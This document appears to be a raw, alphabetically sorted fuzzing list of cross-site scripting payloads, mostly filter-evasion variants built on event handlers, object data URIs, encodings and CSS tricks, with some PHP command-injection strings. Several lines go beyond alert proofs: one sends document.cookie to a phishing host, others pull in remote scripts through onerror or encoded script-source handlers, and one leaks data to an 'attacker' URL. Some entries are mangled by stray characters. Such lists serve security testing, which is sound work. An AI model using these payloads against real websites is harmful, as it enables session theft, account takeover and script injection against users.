- <NeatHtmlReplace_HTML xmlns:xss_NeatHtmlReplace=”xmlns:xss”>
- <NeatHtmlReplace_IFRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_IFRAME>
- <NeatHtmlReplace_INPUT TYPE=”IMAGE” SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_LAYER SRC_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_LAYER>
- <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
- <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_OBJECT classid=”clsid:ae24fdae-03c6–11d1–8b76–0080c744f389"><NeatHtmlReplace_param name=”url” value=”javascript:alert(‘XSS’)”></NeatHtmlReplace_OBJECT>
- <NeatHtmlReplace_OBJECT TYPE=”text/x-scriptlet” DATA_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_OBJECT>
- </NeatHtmlReplace_STYLE><A CLASS=”XSS”></A>
- <NeatHtmlReplace_STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>@import’http://ha.ckers.org/xss.css';</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>li {list-style-image:url(“javascript:alert(‘XSS’)”);}</NeatHtmlReplace_STYLE><UL><LI>XSS
- <NeatHtmlReplace_STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE TYPE=”text/javascript”>alert(‘XSS’);</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}
- <NeatHtmlReplace_TABLE><NeatHtmlParserReset s=’’ d=”” /><script></script><TD BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- </NeatHtmlReplace_TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- <NeatHtmlReplace_XML ID=”I”><NeatHtmlReplace_X>
- <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”behavior:url(xss.htc);”>
- <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”xss:expression(alert(‘XSS’))”>
- <NeatHtmlReplace_xss:xss>XSS</NeatHtmlReplace_xss:xss> </NeatHtmlReplace_HTML>
- (new Array).filter.constructor(‘alert(1)’)()
- new class extends class extends class extends class extends alert(1){}{}{}{}
- new Function`al\ert\`6\``;
- new Function(location.search.slice(1))();
- new Image().src=”http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
- &newLine;javascript:alert(1)
- new new new new new`${alert(1)}`
- new new new new new alert`1`
- new XMLHttpRequest().open(“GET”, “data:text/html,<svg onload=confirm(2)></svg>”, false);
- <noembed><img src=”</noembed><iframe onload=alert(1)>” /></noembed>
- </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
- <noscript><! — </noscript><img src=xx:x onerror=alert(1) →
- <noscript><noscript></noscript><script>confirm(1)</script></noscript>
- null%22%20style%3d%22background%3aexpression%28confirm%282727%29
- o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()//
- o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()
- <object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>
- <object allowscriptaccess=always>
- <object allowscriptaccess=”always” data=”test.swf”></object>
- Object.bind(null,alert)()(1)
- <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT>
- <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT><;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
- <;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><paramname=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
- <OBJECT classid=clsid:…” codebase=”javascript:alert(‘XSS’);”>
- <object classid=”clsid:…” codebase=”javascript:document.vulnerable=true;”>
- <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain);allowscriptaccess=always></object>
- <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dalili
- <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
- <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”type=”image/svg+xml”></object>
- <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml”></object> // Firefox only
- <object data=”data:text/html;base64,%(base64)s”>
- <object data=’data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’ /src>
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
- ><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
- “\”\/><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”> // Firefox only
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <object+data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
- <object data=’data:text/xml,<script xmlns=”http://www.w3.org/1999/xhtml “>confirm(1)</script>>’>
- <object/data=//goo.gl/nlX0P>
- <object/data=//goo.gl/nlX0P?
- <object/data=��//goo.gl/nlX0P��>
- <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
- <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- “><object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <OBJECT data=http://xss.ha.ckers.org width=400 height=400 type=text/x-scriptlet”>
- <object data=”javascript:alert(0)”>
- <object+data=”javascript:alert(0)”>
- <object data=”javascript:alert(1)”>
- <object data=javascript:alert(1)> *
- <object data=javascript:alert(1)>
- <object data=javascript:alert(1)>
- <object data=javascript:alert(172)>
- <object data=”javascript:alert(1)”> // FF <object/data=”javascript:alert(1)”> // FF <object data=”javascript:alert(1)”>
- <object data=”javascript:alert(document.domain)”>
- <object data=”javascript:alert(XSS)”>
- <object/data=”javascript:alert(1)”>
- <object data=javascript:\u0061le%72t(1)>
- <object data=javascript:\u0061le%72t(1)>
- “/><object data=javascript:\u0061le%72t(1)>
- <object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <object data=//pkav/test.swf><param name=movie value=//pkav/test.swf><param name=allowscriptaccess value=always></object>
- <object data=”javascript:alert(1)”>
- <object data=”javascript:ale&# x72;t(1)”>
- <object data=”javascript:alert(1)”>
- Object.defineProperties(window,{‘location’:{value:’javascript:alert(1)’}})
- Object.defineProperty(location,’href’,{writable:false})
- <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object>
- <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- [Object[“keys”](this)[146]](1)
- [Object[“keys”](this)[5]](1)
- <object onafterscriptexecute=confirm(0)>
- <object onbeforeload object onbeforeload=”javascript:javascript:alert(1)”></object onbeforeload>
- <object onbeforescriptexecute=confirm(0)>
- <object onerror=alert(1)>
- <object onerror=javascript:javascript:alert(1)>
- <object onError object onError=”javascript:javascript:alert(1)”></object onError>
- <object onfocus=popup=1;>
- <object><param name=”src” value=
- <object><param name=”src” value=”javascript:alert(0)”></param></object>
- Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;location=’javascript:1+{}’
- Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;while(1){}location=’javascript:1+{}’
- /* →]]>%>?></object></script></title></textarea></noscript></style></xmp>’-/”///><img id=”b1" src=1 onerror=’$.getScript(“http://xss.cx.js", function() { c(); });’>’
- <object src=1 href=1 onerror=”javascript:alert(1)”></object>
- <object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
- “<object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”
- “><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”,
- “/><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://hacker.com/xss.html">
- <;OBJECT TYPE=”;text/x-scriptlet”; DATA=”;http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
- <object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
- “/><object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://www.securitycompass.com/scriptlet.html"></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.cx/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xxxx.com/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”%(scriptlet)s”></OBJECT>
- * {-o-link:’javascript:alert(1)’;-o-link-source: current;}
- /”onafterscriptexecute=alert(‘XSS’) 1=’
- “ onblur=alert(1) autofocus a=”
- “onblur=alert(1)autofocusa=”
- onblur=alert(1) autofocus a=
- “ onblur=alert(XSS) “> <”
- “onBlur=”alert('XSS')”
- _.once(alert(9))
- onclick=’addUser(“23")-alert(1)//”)’
- onclick=’addUser(“23")alert(1)//”)’
- (/* */oNcliCk=alert() )
- “onclick=alert(1)//
- onclick=alert(1)
- ‘“/onclick=’alert(1)’/accesskey=’X’
- “ onclick=alert(1)//<button ‘ onclick=alert()//>
- onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
- �� onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
- onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//”>click
- “ onclick=alert()//<button ‘ onclick=alert()//> */ alert()//<img style=”background-url=eval(onclick)” onclick=alert()>//>
- onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
- “ onclick=alert(XSS) “>
- “onclick=”alert(‘XSS’)”
- onclick=”delFeedback(‘2&apos)alert(1)//’)”
- onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”>
- onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”
- onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
- onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
- “onContextMenu=”alert('XSS')”
- “onCopy=”alert('XSS')”
- “oncut=alert(1)
- “onDblClick=”window[‘aleraaaat’.replace(‘aaaa’,’’)](‘XaaaaSaaaaS’.replace(‘aaaa’,’’).replace(‘aaaa’,’’))”
- ‘/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis’,
- “+onDblClick=prompt(123)”+
- ?onend=javascript:alert(1)//”,
- onerror%3Deval%3Bthrow’%3Dalert%5Cx281%5Cx29'%3B
- “onerror=alert(1)//
- ‘onerror=’alert(‘XSS’)’ a=’.jpg
- ;onerror=confirm;throw 1;
- onerror=confirm;throw 1;
- onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
- onerror=eval;throw’=confirm\x281\x29';
- “+onError=prompt(123)”+
- one={{set(‘_factoryArgs.0’,’script’)}}
- “ onfocus=alert(document.domain) “> <”
- “ onfocus=alert(document.domain) “> <”
- “ onfocus=alert(XSS) “> <”
- “ onfocusin=alert(1) autofocus x=”
- “onfocusin=alert(1)autofocus x=”
- onfocusin=alert(1) autofocus x=
- “onfocusin=”top[‘\x61\x6C\x65\x72\x74’](‘\x58\x53\x53’)”
- onfocus=JaVaSCript:alert(123) autofocus
- ‘ onfocus=JaVaSCript:alert(123) autofocus
- “ onfocus=JaVaSCript:alert(123) autofocus
- onfocus=location=window.name//'
- “ onfocusout=alert(1) autofocus x=”
- “onfocusout=alert(1)autofocus x=”
- onfocusout=alert(1) autofocus x=
- “onfocusout=”parent[String.fromCharCode(500–403,500–392,500–399,500–386,500–384)](String.fromCharCode(300–212,300–217,300–217))”
- “+onfocus=”prompt(1)”+
- “ onfocus=prompt(1) autofocus fragment=”
- “onfocus=”window[‘\141\154\145\162\164’](‘\130\123\123’)”
- “ onfocus=”write(unescape(‘<’)+’script src=’+unescape(‘"http://’)
- “ onhover=”javascript:alert(-1)”
- “onKeyDown=”parent[‘aleraaaaat’.replace(‘aaaaa’,’’)](‘XaaaaaSaaaaaS’.replace(‘aaaaa’,’’).replace(‘aaaaa’,’’))”
- onkeydown=function(){ http://window.open ('//example.com/','_blank','a');}
- onkeydown=function(){ http://window.open (‘//example.com/’,’_blank’,’a’);
- onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();}
- onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();
- “+onkeypress=”prompt(23)”+
- “onload=”a=document.createElement(‘script’);a.setAttribute(‘src’,String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a)
- onload=alert(1)>
- ‘onload=alert(153)><svg/153=’
- ‘onload=alert(1)><svg/1=’
- onload=confirm(1)//
- onload=forms[0].submit()></iframe><form method=POST
- “onMouseDown=”alert('XSS')”
- “onMouseEnter=”alert('XSS')”
- “OnMouseEnter=”confirm()//
- onmouseenter=prompt(document.domain)
- “onMouseLeave=”alert('XSS')”
- “onMouseMove=”alert('XSS')”
- “onMouseOut=”alert('XSS')”
- onmouseover
- On Mouse Over
- “onmouseover=”alert(1)
- “onmouseover=alert(1)//
- “ onmouseover=”alert(4321)” blah=”
- “onmouseover=alert(77)//
- ‘ onmouseover=alert(/Black.Spook/)
- “ onmouseover=alert(XSS) “>
- “ onmouseover=”confirm(1)”style=”position:absolute;width:100%;height:100%;top:0;left:0;”
- ‘ onmouseover=confirm(document.location)
- onmouseover=”document.cookie=true;”>//INJECTX
- “onmouseover=”(new Function(‘rssseturn(alesssrt)’.split(‘sss’).join(‘’)))()((‘SXS’+’SXS’).slice(-5,4))”
- “ onmouseover=”prompt(0) x=”
- “onmouseover=”prompt(0)x=”
- onmouseover=prompt(100) bad=’
- onmouseover=prompt(document.domain
- “+onmouseover=”window.location=’http://localhost'
- “onMouseUp=”window[String.fromCharCode(501–404,501–393,501–400,501–387,501–385)]('XSS')”
- onreadystatechange=”alert(1)”>1</div>
- onreadystatechange=”alert(2)”>2</div>
- “+onReset=prompt(123)”+
- “onresize=prompt(1)>
- onscroll=alert(‘xss’)>
- “onSelect=”alert('XSS')”
- onxxx=yyy
- <o/onmouseover=o=prompt,o``>o
- open(c2.canvas.toDataURL())
- open(‘java’+’script:ale’+’rt(11)’);
- open`javascript:alert(1)//#${‘_self’}`
- open(name)
- open(‘’,’_self’).alert(1)
- Opera:<style>*{-o-link:’data:text/html,<svg/onload=alert(/@garethheyes/)>’;-o-link-source:current}</style><a href=1>aaa
- <option>’><button><img src=x onerror=confirm(0);></button></option>
- “<option>’><button><img src=x onerror=confirm(0);></button></option>”
- ><option>’><button><img src=x onerror=confirm(1);></button></option>
- “\”\/><option>’><button><img src=x onerror=confirm(1);></button></option>”,
- oscriptaalert(�FXSS�F)o/scripta
- “o<x>nmouseover=alert<x>(1)//
- o={x:’’+<s>eva</s>+<s>l</s>,y:’’+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
- <p/%0Aonmouseover%0A=%0Aconfirm(1)>renwax23
- p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
- ?page=javascript:alert(1)”
- p=-alert(1)}//\
- p=`-alert(1)”>’onload=”`<svg/1=’
- p=*/alert(1)”>’onload=”/*<svg/1=’
- p=*/alert(1)</script><script>/*
- p=>alert(1)</script><script/1=
- p=’>alert(1)</script><script/1=’
- ?param1=<script>prompt(9);/*¶m2=*/</script>
- /?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
- /?param=javascript:alert(document.cookie)
- <param name=url value=https://l0.cm/xss.swf>
- $.parseHTML(‘<img src=xx:X onerror=confirm(1)>’)
- parseInt(“confirm”,30) == 8680439 && 8680439..toString(30) == “confirm”
- parseInt(“prompt”,36);
- <path d=”M0,0" style=”marker-start:url(test4.svg#a)”/>
- PATH_INFO:/<link rel=import href=”/bypass/path/<script>alert(1)</script>”>
- <p class=”comment” title=”*/eval(y);/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=””onload=’/*”></p>
- <p class=”comment” title=”*/prompt(1)’”></p>
- <p class=”comment” title=””><script>/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/</script>” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=””><svg/a=”></p>
- <p class=”comment” title=”*/x[0]=’a’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[1]=’l’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[2]=’e’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[3]=’r’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[4]=’t’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[5]=’(‘;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[6]=’1';/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[7]=’)’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x=new Array();/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/y=x.join(‘’);/*” data-comment=’{“id”:1}’></p>
- p.coords.longitude+’,Altitude:’+p.coords.altitude);})
- perl -e 'print \”;<;IMG SRC=java\0script:alert(\”;XSS\”;)>;\”;;' >; out
- perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
- perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
- perl -e 'print \”;<;SCR\0IPT>;alert(\”;XSS\”;)<;/SCR\0IPT>;\”;;' >; out
- perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
- perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
- perl -e ‘print “<IMG id=XSS SRC=java\0script:alert(\”XSS\”)>”;’ > out
- perl -e ‘print “<IMG />”;’ > out
- perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’> out
- perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’ > out
- perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out
- perl -e ‘print “<IMG SRC_NeatHtmlReplace=”java\0script:alert(\"XSS\")”>”;’ > out
- perl -e ‘;print “;<;IM SRC=java\0script:alert(“;XSS”;)>”;;’;>; out
- perl -e ‘print \”<IMG SRC=java\0script:alert(\\”XSS\\”)>\”;’ > out
- perl -e ‘print \”<SCR\0IPT>alert(\\”XSS\\”)</SCR\0IPT>\”;’ > out
- perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- perl -e ‘print “<NeatHtmlLt /><SCR\0IPT>alert(\”XSS\”)<NeatHtmlLt /></SCR\0IPT>”;’ > out
- perl -e ‘;print “;&;<;SCR\0IPT>;alert(“;XSS”;)<;/SCR\0IPT>;”;;’; >; out
- perl -e ‘print “<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
- perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- perl -e ‘print “&<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
- perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out
- ?pg=javascript:alert(1)”,
- <p hidden?={{hidden}}>123</p>
- PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
- PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- PHP a = val2
- <?php echo $_SERVER[‘PHP_SELF’]?>
- <?php header(“Access-Control-Allow-Origin: *”); ?>
- <?php header(��Access-Control-Allow-Origin: *��); ?>
- <?php header(Access-Control-Allow-Origin: *); ?>
- <?php header(‘content-type:text/html;charset=utf-7-utf-8-shift_jis’);?>
- phpmyadmin/js/canvg/flashcanvas.swf?id=test\));}catch(e){alert(document.domain)}//
- “><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
- “><p id=””onmouseover=\u0070rompt(1) //
- <p id=”x”>AAA</p>
- <p id=x>javascrip<x>t:alert(<x>1)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
- <p id=x>javascrip<x>t:alert(<x>2)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
- <p><img class=”reference” contenteditable=”false” data-refid=”2" data-type=”reference” onerror=”eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))” src=”http://img.baidu.com/img/baike/editor/reference.gif" unselectable=”on” /></p>
- <p><img src=”https://attacker/?data=</p>
- p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
- p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
- p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
- <pkav xmlns=”><iframe onload=alert(1)”>123</pkav>
- <plaintext>
- <plaintext/onmousemove=prompt(1)>renwa
- </plaintext\></|\><plaintext/onmouseover=prompt(1)
- ?playerID=a\”;))}catch(e){confirm(document.domain)}//
- ?playerready=alert(document.cookie)
- player.swf?playerready=alert(document.cookie)
- player.swf?tracecall=alert(document.cookie)
- plupload.flash.swf?%#target%g=alert&uid%g=XSS&
- <p onbeforescriptexecute=”alert(1)”><svg><script>\</p>
- <p/onclick=alert(/INJECTX/)>a
- <p oncut=alert(1)>A
- <p/oncut=alert(1)>A
- p=’onload=alert(1)><svg/1=’
- <p onmouseover=alert(/1/)>xxx</p>
- <p/onmouseover=javascript:alert(1); >M</p>
- {{[].pop.constructor(‘alert()’)()}}
- p=\&q=-alert(1)//
- preg_replace(/on\w+\s*=|\>/i, -, $_REQUEST[q]);
- preg_replace(/\<script|=/i, -, $_REQUEST[q]);
- prerequisite: \” => \\\”
- previousSibling.nodeValue, document.body.textContent*
- print ctx.eval(u”’\N{HEAVY BLACK HEART}’”)
- ${@print(system(a?whoamia?))}
- ${@print(system(��dir��))}
- ${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}
- process.open(“/Applications/Calculator.app/Contents/MacOS/Calculator”);
- prompt(0x0064)
- ‘?prompt`1`?’
- ‘*prompt(1)*’
- p’rompt(1)
- prompt(1)-eval(JSON.parse(name).input)
- “(prompt(1))in”
- ;prompt(1)//��;prompt(2)//��;prompt(3)//�V></SCRIPT>��>��><SCRIPT>prompt(4)</SCRIPT>
- “^prompt(9)^”
- “<<prompt(9)<<”
- “<=prompt(9)<=”
- “<prompt(9)<”
- “===prompt(9)===”
- “==prompt(9)==”
- “>=prompt(9)>=”
- “>>>prompt(9)>>>”
- “>>prompt(9)>>”
- “>prompt(9)>”
- “||prompt(9)||”
- “|prompt(9)|”
- “-prompt(9)-”
- “!=prompt(9)!=”
- “?prompt(9):”
- “/prompt(9)/”
- “*prompt(9)*”
- prompt(9)
- prompt`${document.domain}`
- prompt(location.hash)
- //prompt.ml%2f@??
- //prompt.ml%2f@?.ws/?
- prompt = p\u0072om\u0070\u0074
- Prompt = p\u0072om\u0070\u0074
- prompt(‘xss’)
- protected $_expressions = array(
- prototype.join=function(){confirm(“PWND:”+document.body.innerHTML)}’)();
- p=*/</script>’>alert(1)/*<script/1=’
- p[<script>`]=`/alert(70)</script>
- <P><SPAN class=xmsw title=~?O? onmouseout=”window.location=’http://www.xfydyt.com'">F?A?~M</SPAN></P>
- <P STYLE=”behavior:url(‘#default#time2’)” end=”0" onEnd=”javascript:alert(1)”>
- <p style=”font-family:’ar\27 \3bx\3a expression\28xss\28\29\29\3bial’;”></p>
- <p style=”font-family:’foo&#x5c;27&#x5c;3bx:expr&#x65;ession(confirm(1))’”>
- <p style=overflow:auto;font-size:1000px onscroll=alert(33)>script<k/id=die>
- p=<svg/1=’&q=’onload=alert(1)>
